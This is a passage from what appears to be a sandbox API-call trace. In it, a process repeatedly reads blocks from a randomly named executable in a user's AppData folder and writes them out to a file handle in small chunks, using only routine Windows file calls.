(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e46c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0174.100] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0174.100] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.100] GetFileType (hFile=0x54) returned 0x1 [0174.100] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.100] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18e4c4 | out: lpFileSizeHigh=0x18e4c4*=0x0) returned 0x7d600 [0174.100] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.100] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0174.100] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.100] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.101] GetFileType (hFile=0x4c) returned 0x1 [0174.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.101] GetFileType (hFile=0x4c) returned 0x1 [0174.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.101] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] GetFileType (hFile=0x4c) returned 0x1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] GetFileType (hFile=0x4c) returned 0x1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] GetFileType (hFile=0x4c) returned 0x1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] GetFileType (hFile=0x4c) returned 0x1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] GetFileType (hFile=0x4c) returned 0x1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.104] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.104] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.104] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.104] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] GetFileType (hFile=0x4c) returned 0x1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] GetFileType (hFile=0x4c) returned 0x1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] GetFileType (hFile=0x4c) returned 0x1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.105] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.105] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] GetFileType (hFile=0x4c) returned 0x1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] GetFileType (hFile=0x4c) returned 0x1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.106] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.106] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.107] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.107] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.108] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.108] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.109] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.109] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.110] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.110] 